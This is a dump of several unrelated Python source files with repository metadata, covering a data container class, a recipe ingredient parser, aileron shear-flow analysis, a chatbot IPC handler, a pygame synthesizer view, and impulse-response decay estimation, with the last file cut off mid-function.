] | 16 | 2019-02-05T18:21:35.000Z | 2022-02-14T23:37:21.000Z | from . import register_class
from ..container import Container, Data, MultiContainerInterface
from ..utils import docval, call_docval_func, popargs
@register_class('SimpleMultiContainer')
class SimpleMultiContainer(MultiContainerInterface):
__clsconf__ = {
'attr': 'containers',
'type': (Container, Data),
'add': 'add_container',
'get': 'get_container',
}
@docval({'name': 'name', 'type': str, 'doc': 'the name of this container'},
{'name': 'containers', 'type': (list, tuple), 'default': None,
'doc': 'the Container or Data objects in this file'})
def __init__(self, **kwargs):
containers = popargs('containers', kwargs)
call_docval_func(super().__init__, kwargs)
self.containers = containers
| 34.565217 | 79 | 0.646541 | 80 | 795 | 6.175 | 0.475 | 0.052632 | 0.05668 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215094 | 795 | 22 | 80 | 36.136364 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0.240252 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2b566b0a199706f1df36c5f72956f395886a3fe | 3,688 | py | Python | output.py | brianray/chipy_phaser_flask | 94d869a5547e0c9880aeb6687f35b4107d4bd228 | [
"Apache-2.0"
] | 1 | 2017-10-26T14:31:47.000Z | 2017-10-26T14:31:47.000Z | output.py | brianray/chipy_phaser_flask | 94d869a5547e0c9880aeb6687f35b4107d4bd228 | [
"Apache-2.0"
] | null | null | null | output.py | brianray/chipy_phaser_flask | 94d869a5547e0c9880aeb6687f35b4107d4bd228 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
import fractions
import copy
solids = ("flour", "sugar", "salt", "shortening")
liquids = ("water", "spice")
large_items = ("apples", "eggs")
class IngredientBase:
" Base class for common functionality "
target = ()
def __init__(self, ingredient_str):
self.original_ingredient_str = ingredient_str
self.parse_parts(ingredient_str)
self.normalize_qty()
def __repr__(self):
return "<Ingredient ({}): {} - {} {}>".format(self.name,
self.item,
self.qty,
self.unit)
def parse_parts(self, ingredient_str):
parts = ingredient_str.split()
self.qty = parts[0]
self.qty_max = 0
self.unit = parts[1]
self.item = " ".join(parts[2:])
if self.unit == "to" or "-" in self.qty: # means a range was enetered
if "-" in self.qty:
minsize, maxsize = self.qty.split("-")
self.qty = minsize
self.qty_max = maxsize
else: # to
self.qty = parts[0]
self.qty_max = parts[2]
self.unit = parts[3]
self.item = " ".join(parts[4:])
def does_match_target(self, subject_str):
""" Checks if any of the strings in self.target exitst in subject_str
returns: True or False
"""
for item in self.target:
if item.lower() in subject_str.lower():
return True
return False
def normalize_qty(self):
self.qty = fractions.Fraction(self.qty)
def copy(self):
return copy.copy(self)
def empty(self):
to_empty = self.copy()
to_empty.qty = fractions.Fraction(0)
return to_empty
class DrySolid(IngredientBase):
"class for dry solids, like sugar or flour"
name = "solid"
target = solids
class Liquid(IngredientBase):
"class for liquids, like milk or beer"
name = "liquid"
target = liquids
class LargeItem(IngredientBase):
"class for items, like an egg or apple"
name = "large item"
target = large_items
def parse_parts(self, ingredient_str):
parts = ingredient_str.split()
self.qty = parts[0]
self.qty_max = 0
self.unit = "item"
self.item = " ".join(parts[1:])
if self.unit == "to" or "-" in self.qty: # means a range was enetered
if "-" in self.qty:
minsize, maxsize = self.qty.split("-")
self.qty = minsize
self.qty_max = maxsize
else: # to
self.qty = parts[0]
self.qty_max = parts[2]
self.unit = "item"
self.item = " ".join(parts[3:])
def return_instance(ingredient):
"given an ingredient string, return the intance"
instance = None
if is_ingredient_in_list(solids, ingredient):
instance = DrySolid(ingredient) #<-- now put it here
elif is_ingredient_in_list(liquids, ingredient):
instance = Liquid(ingredient) #<-- and here
elif is_ingredient_in_list(large_items, ingredient):
instance = LargeItem(ingredient) #<-- and here
else:
raise Exception("don't know what is '{}'".format(ingredient))
# removed the parse call
return instance
def is_ingredient_in_list(the_list, ingredient_string):
"if any item "
for list_item in the_list:
if list_item in ingredient_string:
return True
return False
| 31.793103 | 77 | 0.548265 | 425 | 3,688 | 4.621176 | 0.254118 | 0.074847 | 0.03055 | 0.026477 | 0.293279 | 0.293279 | 0.266802 | 0.245418 | 0.245418 | 0.245418 | 0 | 0.006656 | 0.348156 | 3,688 | 115 | 78 | 32.069565 | 0.810316 | 0.120119 | 0 | 0.336957 | 0 | 0 | 0.101665 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.021739 | 0.021739 | 0.336957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2b650a2c9fcb4957af24d4d2a31a4ce6388ab32 | 9,261 | py | Python | shear_force.py | albiboni/AileronSimulation | 7b7cdb6759a285bc9729e8594979c428ba3620af | [
"MIT"
] | 6 | 2019-02-05T06:03:20.000Z | 2021-06-26T23:15:25.000Z | shear_force.py | xaviergoby/AileronSimulation | 7b7cdb6759a285bc9729e8594979c428ba3620af | [
"MIT"
] | null | null | null | shear_force.py | xaviergoby/AileronSimulation | 7b7cdb6759a285bc9729e8594979c428ba3620af | [
"MIT"
] | 4 | 2019-02-12T22:22:57.000Z | 2021-06-26T23:15:26.000Z | import numpy as np
from Boom import *
from inertia import *
from reaction_forces import *
from internal_forces import *
import matplotlib.pyplot as plt
Iyy, Izz = get_inertia(Booms) #coordinate frame crosssection
Cz = centroid(Booms)
'''
Calculates Shear flow in the structure
'''
def get_forces(position, theta):
'''
this function comuptes the sum of forces in y and z in the cross_section reference frame at given x position
:param position: position in x direction in global reference frame from hinge3 --> hinge1
:param theta: rotation angle of cross_section
:return: sum of forces in y and z in the cross_section reference system at the specific x position
'''
rotate_y = np.dot(rotation_matrix(theta),np.array([0., get_shear_Fy(position, 1,1,1)]))
rotate_z = np.dot(rotation_matrix(theta),np.array([get_shear_Fz(position, 1,1,1), 0.]))
Vy = rotate_y[1]+ rotate_z[1]
Vz = rotate_y[0] + rotate_z[0]
return Vy, Vz
def get_qb(NSpS, Iyy, Izz, Vz1, Vy1, BrA):
'''
Get open section shear flow q_B with imaginary cut.
:param NSpS: half number of booms
:param Iyy: inertia in y
:param Izz: inertia in z
:param Vz1: sum of forces in z
:param Vy1: sum of forces in y
:param BrA: boom area
:return: shear flow q_B
'''
Qb = np.zeros(NSpS+3)
Qb[7] = -Vz1/Iyy*BrA[7]*Sty[7] - Vy1/Izz*BrA[7]*(StZ[7] - Cz) + Qb[8]
Qb[6] = -Vz1/Iyy*BrA[6]*Sty[6] - Vy1/Izz*BrA[6]*(StZ[6] - Cz) + Qb[7]
Qb[5] = -Vz1/Iyy*BrA[5]*Sty[5] - Vy1/Izz*BrA[5]*(StZ[5] - Cz) + Qb[6]
Qb[4] = -Vz1/Iyy*BrA[4]*Sty[4] - Vy1/Izz*BrA[4]*(StZ[4] - Cz) + Qb[5]
Qb[3] = -Vz1/Iyy*BrA[3]*Sty[3] - Vy1/Izz*BrA[3]*(StZ[3] - Cz) + Qb[4]
Qb[1] = (-Vz1/Iyy*BrA[1]*Sty[1] - Vy1/Izz*BrA[1]*(StZ[1] - Cz)) + Qb[0]
Qb[2] = (-Vz1/Iyy*BrA[2]*Sty[2] - Vy1/Izz*BrA[2]*(StZ[2] - Cz)) + Qb[1]
Qb[9] = (-Vz1/Iyy*BrA[8]*Sty[8] - Vy1/Izz*BrA[8]*(StZ[8] - Cz)) + Qb[1] - Qb[2]
return Qb
def get_Qs01(ha, q, Sa, skt, spt, s): #closed section shear flow 1 for the LE of the Aileron
'''
closed section shear flow 1 for the semicircle part
:param ha: aileron height [m]
:param q: open section shear flow
:param Sa: half of the surface distance of the Aileron
:param skt: skin thickness
:param spt: Spar thickness
:param s: Stringer Location
:return: closed section shear flow 1 for the semicircle part
'''
q1c1 = 2*(q[1]*(s[8] - s[1])) + q[9]*ha*skt/spt
q1c2 = -(2*((s[8] - s[0])) + ha*skt/spt)
q2c1 = 2*(q[3]*(s[3] - s[2]) + q[2]*(s[2] - s[8]) + q[4]*(s[4] - s[3]) + q[5]*(s[5] - s[4]) + q[6]*(s[6] - s[5]) + q[7]*(s[7] - s[6]) + q[8]*(Sa - s[7])) - q[9]*ha*skt/spt
q2c2 = -(2*(Sa - s[8]) + ha*skt/spt)
h3 = ha*skt/spt
qs02 = (q2c1 - (q1c1/q1c2)*h3)/(q2c2 + h3**2/q1c2)
qs01 = (q1c1 - qs02*h3)/q1c2
return qs01
def get_Qs02(ha, q, Sa, skt, spt, s):
'''
closed section shear flow 2 for the triangular part
:param ha: aileron height [m]
:param q: open section shear flow
:param Sa: half of the surface distance of the Aileron
:param skt: skin thickness
:param spt: Spar thickness
:param s: Stringer Location
:return: closed section shear flow 2 for the triangular part
'''
q1c1 = 2*(q[1]*(s[8] - s[1])) + q[9]*ha*skt/spt
q1c2 = -(2*((s[8] - s[0])) + ha*skt/spt)
q2c1 = 2*(q[3]*(s[3] - s[2]) + q[2]*(s[2] - s[8]) + q[4]*(s[4] - s[3]) + q[5]*(s[5] - s[4]) + q[6]*(s[6] - s[5]) + q[7]*(s[7] - s[6]) + q[8]*(Sa - s[7])) - q[9]*ha*skt/spt
q2c2 = -(2*(Sa - s[8]) + ha*skt/spt)
h3 = ha*skt/spt
qs02 = (q2c1 - (q1c1/q1c2)*h3)/(q2c2 + h3**2/q1c2)
qs01 = (q1c1 - qs02*h3)/q1c2
return qs02
def get_q_shear(NSpS, Iyy, Izz, Vz1, Vy1, BrA, qs01, qs02):
'''
Get open section shear flow q_B with imaginary cut.
:param NSpS: half number of booms
:param Iyy: inertia in y
:param Izz: inertia in z
:param Vz1: sum of forces in z
:param Vy1: sum of forces in y
:param BrA: boom area
:return: shear flow q_B
'''
Qb = np.zeros((NSpS+3))
Qb[0] = qs01
Qb[8] = qs02
Qb[7] = -Vz1/Iyy*BrA[7]*Sty[7] - Vy1/Izz*BrA[7]*(StZ[7] - Cz) + Qb[8]
Qb[6] = -Vz1/Iyy*BrA[6]*Sty[6] - Vy1/Izz*BrA[6]*(StZ[6] - Cz) + Qb[7]
Qb[5] = -Vz1/Iyy*BrA[5]*Sty[5] - Vy1/Izz*BrA[5]*(StZ[5] - Cz) + Qb[6]
Qb[4] = -Vz1/Iyy*BrA[4]*Sty[4] - Vy1/Izz*BrA[4]*(StZ[4] - Cz) + Qb[5]
Qb[3] = -Vz1/Iyy*BrA[3]*Sty[3] - Vy1/Izz*BrA[3]*(StZ[3] - Cz) + Qb[4]
Qb[1] = (-Vz1/Iyy*BrA[1]*Sty[1] - Vy1/Izz*BrA[1]*(StZ[1] - Cz)) + Qb[0]
Qb[2] = (-Vz1/Iyy*BrA[2]*Sty[2] - Vy1/Izz*BrA[2]*(StZ[2] - Cz)) + Qb[1]
Qb[9] = (-Vz1/Iyy*BrA[8]*Sty[8] - Vy1/Izz*BrA[8]*(StZ[8] - Cz)) + Qb[1] - Qb[2]
#rest= -Qb[:-1] #better positive
#q_total = np.append(Qb, rest)
return Qb
def Shear_moment_arm(NSpS, StZ, Sty, ha, Qsc): # finding the moment arm for the moment equation for shear flows.
q = Qsc
Qsct = 0
Qscy = np.zeros(NSpS + 3)
Qscy[0] = 2 * Qsc[0] * (StZ[1] - StZ[0]) * Sty[0]
Qscy[1] = 2 * Qsc[1] * np.abs(StZ[8] - StZ[1]) * Sty[1]
Qscy[2] = 2 * Qsc[2] * np.abs(StZ[2] - StZ[8]) * Sty[8]
Qscy[3] = 2 * Qsc[3] * np.abs(StZ[3] - StZ[2]) * Sty[2]
Qscy[4] = 2 * Qsc[4] * np.abs(StZ[4] - StZ[3]) * Sty[3]
Qscy[5] = 2 * Qsc[5] * np.abs(StZ[5] - StZ[4]) * Sty[4]
Qscy[6] = 2 * Qsc[6] * np.abs(StZ[6] - StZ[5]) * Sty[5]
Qscy[7] = 2 * Qsc[7] * np.abs(StZ[7] - StZ[6]) * Sty[6]
Qscy[8] = 0
Qscy[9] = 0
Qscz = np.zeros(NSpS + 3)
Qscz[0] = 2 * Qsc[0] * (Sty[1] - Sty[0]) * (StZ[0] - ha / 2)
Qscz[1] = 2 * Qsc[1] * (Sty[8] - Sty[1]) * (StZ[1] - ha / 2)
Qscz[2] = 2 * Qsc[2] * (Sty[2] - Sty[8]) * (StZ[8] - ha / 2)
Qscz[3] = 2 * Qsc[3] * (Sty[3] - Sty[2]) * (StZ[2] - ha / 2)
Qscz[4] = 2 * Qsc[4] * (Sty[4] - Sty[3]) * (StZ[3] - ha / 2)
Qscz[5] = 2 * Qsc[5] * (Sty[5] - Sty[4]) * (StZ[4] - ha / 2)
Qscz[6] = 2 * Qsc[6] * (Sty[6] - Sty[5]) * (StZ[5] - ha / 2)
Qscz[7] = 2 * Qsc[7] * (Sty[7] - Sty[6]) * (StZ[6] - ha / 2)
Qscz[8] = 0
Qscz[9] = Qsc[9] * (ha) * (StZ[8] - ha / 2)
for i in xrange(0, NSpS + 3, 1):
Qsct += Qscy[i] + Qscz[i]
return Qsct
def ShearCenterZ(Qsct, qs01, qs02, Ac, At, ha, Vy):
VZsc = ((Qsct + 2*Ac*qs01 + 2*At*qs02))/Vy - ha/2
#VYsc = ((Qsct + 2*Ac*qs01 + 2*At*qs02))/Vzsc
#print "this should be 0 for shear center Y: ", VYsc/Vzsc
return VZsc
def get_q_torque(position):
Torque = -get_moment_Mx(position, 1., 1., 1.)
triangle_term = (2*Lsl/t_sk+h_a/t_sp)/(2.*At*G)
circle_term = (CirC/2*t_sk + h_a/t_sp)/(2*Ac*G)
A_torque = np.array([[1., 1., 0, 0],
[-1., 0, 2. * Ac, 0],
[0, -1., 0, 2. * At],
[0, 0, circle_term, -triangle_term]])
b_torque = np.array([Torque, 0., 0.,0.])
sol_torq = np.linalg.solve(A_torque, b_torque) #Tc, Tt, qTc, qTt
return sol_torq
def get_twist(position):
q = get_q_torque(position)[3]
circle_term = (CirC / 2 * t_sk + h_a / t_sp) / (2 * Ac * G)
triangle_term = (2 * Lsl / t_sk + h_a / t_sp) / (2. * At * G)
theta_distribution = q*triangle_term
return theta_distribution*180./np.pi
'''Print shear center
Vy, Vz = get_forces(1.5, theta)
qb = get_qb(NSpS, Iyy, Izz, Vz, Vy, BrA)
qs01 = get_Qs01(h_a, qb, Sa, t_sk, t_sp, StrinLoc)
qs02 = get_Qs02(h_a, qb, Sa, t_sk, t_sp, StrinLoc)
moment_arm = Shear_moment_arm(NSpS, StZ, Sty, h_a, qb)
print(ShearCenterZ(moment_arm, qs01, qs02, Ac, At, h_a, Vy))
'''
'''Print Twist'''
n_points = 1000
x_points = np.linspace(0, l_a, num=n_points)
step = 2.6e-3
y_points = np.zeros((n_points))
start_angle = 28
for i in range(np.size(x_points)):
start_angle += get_twist(x_points[i])*step
y_points[i] += start_angle
plt.plot(x_points,y_points)
plt.title("Aileron's twist along the span")
plt.xlabel('Span-wise location[m], from hinge 3 to 1', fontsize=10)
plt.ylabel('Aileron twist [deg]', fontsize=10)
plt.legend()
plt.show()
def compute_q(position):
Vy, Vz = get_forces(position, theta) #first entry refers to the position
qb = get_qb(NSpS, Iyy, Izz, Vz, Vy, BrA)
qs01 = get_Qs01(h_a, qb, Sa, t_sk, t_sp, StrinLoc)
qs02 = get_Qs02(h_a, qb, Sa, t_sk, t_sp, StrinLoc)
q_shear = get_q_shear(NSpS, Iyy, Izz, Vz, Vy, BrA, qs01, qs02)
q_T=get_q_torque(position)
q_circle = q_shear[:2]+q_T[2],
q_spar = q_shear[9]+q_T[2]-q_T[3]
q_triangle = q_shear[2:9] + q_T[3]
q_tot = np.append(q_circle,np.append(q_triangle,q_spar))
return q_tot
'''Get max shear in ribs
n_points = 1000
x_points = np.linspace(0, l_a, num=n_points)
y_points = np.zeros((n_points,3))
for i in range(np.size(x_points)):
run = compute_q(x_points[i])
idx = np.argmax(run)
y_points[i] = np.append(x_points[i], np.append(idx, run[int(idx)]))
idx = np.argmax(y_points[:,2])
y_points = y_points
massimo = y_points[idx]
print(massimo)
x_points= np.array([x_R_1y, x_F_I, x_P, x_R_2y])
n_points = 1000
#x_points = np.linspace(0, l_a, num=n_points)
y_points = np.zeros((len(x_points),3))
for i in range(np.size(x_points)):
run = compute_q(x_points[i])
idx = np.argmax(run)
y_points[i] = np.append(x_points[i], np.append(idx, run[idx]))
y_points = y_points
print(y_points)
'''
| 36.317647 | 175 | 0.57672 | 1,770 | 9,261 | 2.924294 | 0.120339 | 0.018547 | 0.027821 | 0.01507 | 0.555641 | 0.552743 | 0.5284 | 0.504057 | 0.49942 | 0.482032 | 0 | 0.075385 | 0.222222 | 9,261 | 254 | 176 | 36.46063 | 0.643204 | 0.195983 | 0 | 0.276923 | 0 | 0 | 0.014512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.046154 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2b74876fe16e263d2f11a53b922f99526d2c23f | 682 | py | Python | src/agent/message_handler.py | GMcLachlan45/chatbot-app | 38e48092a611d91d594a173adf07b267bea38cfe | [
"MIT"
] | null | null | null | src/agent/message_handler.py | GMcLachlan45/chatbot-app | 38e48092a611d91d594a173adf07b267bea38cfe | [
"MIT"
] | null | null | null | src/agent/message_handler.py | GMcLachlan45/chatbot-app | 38e48092a611d91d594a173adf07b267bea38cfe | [
"MIT"
] | null | null | null | from agent import Agent
from ipc.ipc_message import IPCMessage
from ipc.ipc_pipe import IPCPipe
from ipc.ipc_message_handler import IPCMessageHandler
MESSAGE_TYPE = {
"AGENT_RESPONSE": 0,
"AGENT_QUERY": 1,
}
class MessageHandler(IPCMessageHandler):
def __init__(self, agent: Agent):
self.agent = agent
def handle_message(self, ipc_pipe: IPCPipe, message: IPCMessage):
if (message.type == MESSAGE_TYPE["AGENT_QUERY"]):
agent_response = self.agent.query(message.body)
ipc_pipe.send_message(
MESSAGE_TYPE["AGENT_RESPONSE"],
agent_response,
message.id
) | 29.652174 | 69 | 0.648094 | 77 | 682 | 5.467532 | 0.324675 | 0.104513 | 0.071259 | 0.08076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004008 | 0.268328 | 682 | 23 | 70 | 29.652174 | 0.839679 | 0 | 0 | 0 | 0 | 0 | 0.073206 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.210526 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2b850d63e534fdf62f6375992b652934851f931 | 3,440 | py | Python | view.py | alexeifigueroa/ASEPetSynthesizer | bcb611412d3167675de1009da93d9976ad1e0ac7 | [
"MIT"
] | null | null | null | view.py | alexeifigueroa/ASEPetSynthesizer | bcb611412d3167675de1009da93d9976ad1e0ac7 | [
"MIT"
] | null | null | null | view.py | alexeifigueroa/ASEPetSynthesizer | bcb611412d3167675de1009da93d9976ad1e0ac7 | [
"MIT"
] | null | null | null | '''
Created on Jan 3, 2018
@author: Alexei Figueroa
This module holds the classes related to views in the synthesizer application.
'''
import pygame,abc,CONSTANTS
class View(metaclass=abc.ABCMeta):
"""
Abstract class specifying the method signatures of a View
"""
def __init__(self, screen):
self.screen=screen
@abc.abstractmethod
def draw(self):
"""
This method should enable the View to be rendered on
the screen.
"""
class KeyboardView(View):
'''
This class draws the synthesizer keyboard on the screen
it implements the View interface.
'''
def __init__(self, screen):
'''
Constructor
@screen: pygame.display
Canvas where the keyboard will be rendered
'''
super().__init__(screen)
self.__pressed={}
def draw(self):
'''
This method renders the each key, set's a label for
each one of them depending on the state of the View.
'''
x0=90
y0=40
label_font = pygame.font.SysFont("monospace", 15)
#Render white keys
for code,k,label,x in CONSTANTS.whites:
width=20
height=200
x_i=10+x*(width+2)+x0
color_i=CONSTANTS.color_white if code not in self.pressed else CONSTANTS.color_pressed
pygame.draw.rect(self.screen, color_i, [x_i, y0, width, height])
k_label = label_font.render(k, 1, CONSTANTS.color_black)
self.screen.blit(k_label, (x_i+width/3, height-20+y0))
#Render black keys
for code,k,label,x in CONSTANTS.blacks:
color_i=CONSTANTS.color_black if code not in self.pressed else CONSTANTS.color_pressed
width=15
height=130
x_i=10+(20+2)*x-width/2+x0
pygame.draw.rect(self.screen, color_i, [x_i, y0, width, height])
k_label = label_font.render(k, 1, CONSTANTS.color_white)
self.screen.blit(k_label, (x_i+width/5, height-20+y0))
"""
Getters and setters, properties
"""
#Property holding the state of the pressed keys in the View.
def set_pressed(self,pressed):
self.__pressed=pressed
def get_pressed(self):
return self.__pressed
pressed=property(get_pressed,set_pressed)
class VibratoView(View):
"""
This class draws the vibrato control on the screen, it implements
the View interface
"""
def __init__(self, screen):
'''
Constructor
@screen: pygame.display
Canvas where the vibrato control will be rendered
'''
super().__init__(screen)
self.__vibrato=False
def draw(self):
label_font = pygame.font.SysFont("monospace", 15)
vibrato_state={False:"Toggle vibrato with V (off)",
True:"Toggle vibrato with V (on)"}
vibrato_label = label_font.render(vibrato_state[self.__vibrato], 1, CONSTANTS.color_white)
pygame.draw.rect(self.screen,CONSTANTS.color_black,[20,280,400,20])
self.screen.blit(vibrato_label, (20, 280))
"""
Getters and setters, properties
"""
#Property holding the state of the vibrato being displayed.
def get_vibrato(self):
return self.__vibrato
def set_vibrato(self,vibrato):
self.__vibrato=vibrato
vibrato=property(get_vibrato,set_vibrato)
| 32.45283 | 98 | 0.618023 | 444 | 3,440 | 4.623874 | 0.272523 | 0.048709 | 0.013639 | 0.024842 | 0.452021 | 0.399415 | 0.399415 | 0.331223 | 0.276668 | 0.276668 | 0 | 0.026069 | 0.286337 | 3,440 | 106 | 99 | 32.45283 | 0.810183 | 0.250872 | 0 | 0.235294 | 0 | 0 | 0.031305 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.196078 | false | 0 | 0.019608 | 0.039216 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2ba4d83b84f13b1d2fe64bb14e4c12d52605ccc | 32,125 | py | Python | impulse_response.py | godlovesdavid/Impulcifer | c217a505a492174612e39245a742bb01058cc0af | [
"MIT"
] | 105 | 2018-12-08T18:18:03.000Z | 2022-03-21T16:57:27.000Z | impulse_response.py | godlovesdavid/Impulcifer | c217a505a492174612e39245a742bb01058cc0af | [
"MIT"
] | 61 | 2019-06-03T16:21:07.000Z | 2022-02-23T20:32:55.000Z | impulse_response.py | godlovesdavid/Impulcifer | c217a505a492174612e39245a742bb01058cc0af | [
"MIT"
] | 9 | 2020-01-29T10:10:27.000Z | 2022-02-24T20:26:53.000Z | # -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from matplotlib.mlab import specgram
from matplotlib.ticker import LinearLocator, FormatStrFormatter, FuncFormatter
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
from mpl_toolkits.axes_grid1 import make_axes_locatable
from scipy import signal, stats, ndimage, interpolate
import nnresample
from copy import deepcopy
from autoeq.frequency_response import FrequencyResponse
from utils import magnitude_response, get_ylim, running_mean
from constants import COLORS
class ImpulseResponse:
def __init__(self, data, fs, recording=None):
self.fs = fs
self.data = data
self.recording = recording
def copy(self):
return deepcopy(self)
def __len__(self):
"""Impulse response length in samples."""
return len(self.data)
def duration(self):
"""Impulse response duration in seconds."""
return len(self) / self.fs
def peak_index(self, start=0, end=None, peak_height=0.12589):
"""Finds the first high (negative or positive) peak in the impulse response wave form.
Args:
start: Index for start of search range
end: Index for end of search range
peak_height: Minimum peak height. Default is -18 dBFS
Returns:
Peak index to impulse response data
"""
if end is None:
end = len(self.data)
# Peak height threshold, relative to the data maximum value
# Copy to avoid manipulating the original data here
data = self.data.copy()
# Limit search to given range
data = data[start:end]
# Normalize to 1.0
data /= np.max(np.abs(data))
# Find positive peaks
peaks_pos, properties = signal.find_peaks(data, height=peak_height)
# Find negative peaks that are at least
peaks_neg, _ = signal.find_peaks(data * -1.0, height=peak_height)
# Combine positive and negative peaks
peaks = np.concatenate([peaks_pos, peaks_neg])
# Add start delta to peak indices
peaks += start
# Return the first one
return np.min(peaks)
def decay_params(self):
"""Determines decay parameters with Lundeby method
https://www.ingentaconnect.com/content/dav/aaua/1995/00000081/00000004/art00009
http://users.spa.aalto.fi/mak/PUB/AES_Modal9992.pdf
Returns:
- peak_ind: Fundamental starting index
- knee_point_ind: Index where decay reaches noise floor
- noise_floor: Noise floor in dBFS, also peak to noise ratio
- window_size: Averaging window size as determined by Lundeby method
"""
peak_index = self.peak_index()
# 1. The squared impulse response is averaged into localtime intervals in the range of 10–50 ms,
# to yield a smooth curve without losing short decays.
data = self.data.copy()
# From peak to 2 seconds after the peak
data = data[peak_index:min(peak_index + 2 * self.fs, len(self))]
data /= np.max(np.abs(data)) # Normalize
squared = data ** 2 # Squared impulse response starting from the peak
t_squared = np.linspace(0, len(squared) / self.fs, len(squared)) # Time stamps starting from peak
wd = 0.03 # Window duration, let's start with 30 ms
n = int(len(squared) / self.fs / wd) # Number of time windows
w = int(len(squared) / n) # Width of a single time window
t_windows = np.arange(n) * wd + wd / 2 # Timestamps for the window centers
windows = squared.copy() # Copy to avoid modifying the original
windows = np.reshape(windows[:n * w], (n, w)) # Split into time windows, one window per row
windows = np.mean(windows, axis=1) # Average each time window
windows = 10 * np.log10(windows) # dB
# 2. A first estimate for the background noise level is determined from a time segment containing the last
# 10 % of the impulse response. This gives a reasonable statistical selection without a large systematic error,
# if the decay continues to the end of the response.
tail = squared[int(-0.1 * len(squared)):] # Last 10 %
noise_floor = 10 * np.log10(np.mean(tail)) # Mean as dBs, not mean of dB values
# 3. The decay slope is estimated using linear regression between the time interval containing the response
# 0 dB peak, and the first interval 5–10 dB above the background noise level.
slope_end = np.argwhere(windows <= noise_floor + 10)[0, 0] - 1 # Index previous to the first below 10 dB
slope, intercept, _, _, _ = stats.linregress(t_windows[:slope_end], windows[:slope_end])
# 4. A preliminary knee point is determined at the intersection of the decay slope and the background noise
# level.
# Everything falls apart if this is not in the decay range but in the tail
# This can happen when there is a long tail which has plateau first but then starts to decay again
# in that case the noise floor estimated from the end of the impulse response is far below the knee point.
# Should be preventable by truncating the impulse response to N seconds after the peak
knee_point_time = (noise_floor - intercept) / slope
# 5. A new time interval length is calculated according to the calculated slope, so that there are 3–10
# intervals per 10 dB of decay.
n_windows_per_10dB = 3
wd = 10 / (abs(slope) * n_windows_per_10dB)
n = int(len(squared) / self.fs / wd) # Number of time windows
w = int(len(squared) / n) # Width of a single time window
t_windows = np.arange(n) * wd + wd / 2 # Time window center time stamps
# 6. The squared impulse is averaged into the new local time intervals.
windows = squared.copy()
windows = np.reshape(windows[:n * w], (n, w)) # Split into time windows
windows = np.mean(windows, axis=1) # Average each time window
windows = 10 * np.log10(windows) # dB
try:
knee_point_index = np.argwhere(t_windows >= knee_point_time)[0, 0]
knee_point_value = windows[knee_point_index]
except IndexError as err:
# Probably tail has already been cropped
return peak_index, len(self), noise_floor, w
# print(f' Knee point: {knee_point_value:.2f} dB @ {knee_point_time * 1000:.0f} ms')
# Steps 7–9 are iterated until the knee_point is found to converge(max. 5 iterations).
for i in range(5):
# print(f' iter {i}')
# 7. The background noise level is determined again. The evaluated noise segment should start from a
# point corresponding to 5–10 dB of decay after the knee_point, or a minimum of 10 % of the total
# response length.
try:
noise_floor_start_index = np.argwhere(windows <= knee_point_value - 5)[0, 0]
except IndexError:
break
noise_floor_start_time = max(t_windows[noise_floor_start_index], 0.1 * self.duration())
# Protection against over shooting the impulse response end, in case the IR has been truncated already
# In that case the noise floor will be calculated from the last half of the last window
noise_floor_start_time = min(noise_floor_start_time, t_windows[-1])
# noise_floor_end_time = noise_floor_start_time + 0.1 * len(squared) / ir.fs # TODO: Until the very end?
# Noise floor estimation range ends one full decay time after the start, truncated to the IR length
noise_floor_end_time = min(noise_floor_start_time + knee_point_time, self.duration())
noise_floor = np.mean(squared[np.logical_and(
t_squared >= noise_floor_start_time,
t_squared <= noise_floor_end_time
)])
noise_floor = 10 * np.log10(noise_floor) # dB
# print(f' Noise floor '
# f'({(noise_floor_start_time + peak_index / self.fs) * 1000:.0f} ms -> '
# f'{(noise_floor_end_time + peak_index / self.fs) * 1000:.0f} ms): '
# f'{noise_floor}')
# 8. The late decay slope is estimated for a dynamic range of 10–20 dB, starting from a point 5–10 dB above
# the noise level.
slope_end_headroom = 8
slope_dynamic_range = 20
try:
